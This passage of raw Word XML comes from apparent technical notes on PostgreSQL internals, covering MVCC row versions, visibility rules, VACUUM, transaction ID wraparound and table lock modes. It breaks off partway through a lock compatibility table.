      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  cmax:   command ID within deleting transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B976E10" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  ctid:   physical location (page, slot) of this tuple</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6610F0" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A498B6" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Example: UPDATE balance from 1000 to 900</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06834993" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="75AA3C81" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Before UPDATE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE0123B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Row version 1: (xmin=100, xmax=0, balance=1000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15283488" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">                 xmax=0 means: row is current, not deleted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427409BE" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="78A68AAC" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>After UPDATE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2822E1B8" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Row version 1: (xmin=100, xmax=200, balance=1000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3A25C9" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">                 xmax=200: deleted by transaction 200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC876F9" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Row version 2: (xmin=200, xmax=0, balance=900)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1788F7F7" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">                 new version created by transaction 200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9D7979" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="404A0062" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Transaction visibility rules:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FD78F4" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  A row version is visible to transaction T if:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2416222D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    xmin is committed AND xmin &lt; T's snapshot XID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0029E3CE" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    AND (xmax is 0 OR xmax is not committed OR xmax &gt;= T's snapshot XID)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621505F0" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B91B98E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  In English: "created before my snapshot AND not yet deleted at my snapshot"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00885DFF" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="0A8AB836" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Snapshot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C9A86B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Taken at transaction start (Repeatable Read) or statement start (Read Committed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014EC3B7" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Contains:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B6ED1A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    xmin: oldest active transaction ID at snapshot time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B2E7B0" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    xmax: next transaction ID to be assigned (any tx &gt;= xmax is invisible)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6EFB1F" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    xip:  list of active transaction IDs at snapshot time (in-progress, invisible)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA47FDF" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="30CA5CEA" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>VACUUM — the garbage collection mechanism:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5B3ABF" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Old row versions accumulate (each UPDATE creates a new version)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE9A500" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  No reader needs old versions anymore: they can be removed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6BD541" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E0F9F3" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  VACUUM: scans tables, removes row versions where xmax is committed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E1C93A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">          AND no active transaction has a snapshot old enough to see them</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF189EA" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F44B9A9" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Without VACUUM: table grows indefinitely (each UPDATE adds a row version)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A93788F" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368502EE" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  autovacuum: background process, runs automatically based on:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CE3D67" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Dead tuple count exceeds autovacuum_vacuum_threshold + autovacuum_vacuum_scale_factor × table_size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E166333" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE859A5" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  VACUUM FREEZE: also updates xmin to FrozenTransactionId for very old rows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC3D8AD" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Transaction IDs wrap around (32-bit → 2^31 = ~2 billion)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735C0E21" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Without freeze: old rows become "in the future" after wraparound → invisible!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D970B6A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    autovacuum prevents wraparound automatically (age-based triggering)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169DAC10" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="39DEB163" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Transaction ID wraparound (critical operational concern):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F47F90F" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  PostgreSQL TXIDs: 32-bit, ~2.1 billion values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772A82F9" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Wraparound horizon: ~2 billion transactions after last freeze</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EF7215" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F8718F" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  At 1000 TPS: ~2 billion / (1000 × 86400 × 365) ≈ 63 years per wraparound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3629644D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  At 100K TPS: ~0.6 years per wraparound — dangerous!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF9A048" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F86E0D8" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  pg_database.datfrozenxid: oldest non-frozen TXID per database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346C8D85" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  age(datfrozenxid): how close to wraparound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437DF2FE" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DFE5A5" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Alert if age(datfrozenxid) &gt; 1.5 billion (25% safety margin before 2.1B limit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1579CFF3" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  autovacuum_freeze_max_age: trigger aggressive freeze at this age (default: 200M)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2B4B0E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Locking — The Concurrency Control Mechanisms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EB579E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lock granularity hierarchy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8D01DE" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8D87B4" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>PostgreSQL lock hierarchy (coarsest to finest):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339BD278" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="7BE60368" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Table-level locks (held for statement or transaction duration):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421DA75D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  ACCESS SHARE:        SELECT (allows all except ACCESS EXCLUSIVE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AA7AEC" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  ROW SHARE:           SELECT FOR UPDATE/SHARE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553A64EF" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  ROW EXCLUSIVE:       INSERT, UPDATE, DELETE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3EFD51" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  SHARE UPDATE EXCLUSIVE: VACUUM, CREATE INDEX CONCURRENTLY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5788D3C2" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  SHARE:               CREATE INDEX (non-concurrent)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37309052" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  SHARE ROW EXCLUSIVE: CREATE TRIGGER, some FK operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1D6145" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  EXCLUSIVE:           REFRESH MATERIALIZED VIEW CONCURRENTLY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2978D8" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  ACCESS EXCLUSIVE:    ALTER TABLE, DROP TABLE, TRUNCATE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110DDC13" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">                       (blocks ALL other access — careful!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC08411" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="03975EBD" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Compatibility (row = what I hold, col = what others want):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611A34FA" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">         AS   RS   RE  SUE   S  SRE   E   AE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456F3D20" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  AS     ✓    ✓    ✓    ✓    ✓   ✓    ✓    </w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5788DA74" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  RS     ✓    ✓    ✓    ✓    ✓   ✓    </w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38316836" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  RE     ✓    ✓    ✓    ✓    </w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A77B1D0" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  SUE    ✓    ✓    ✓    </w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CED5C5E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  S      ✓    ✓    </w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
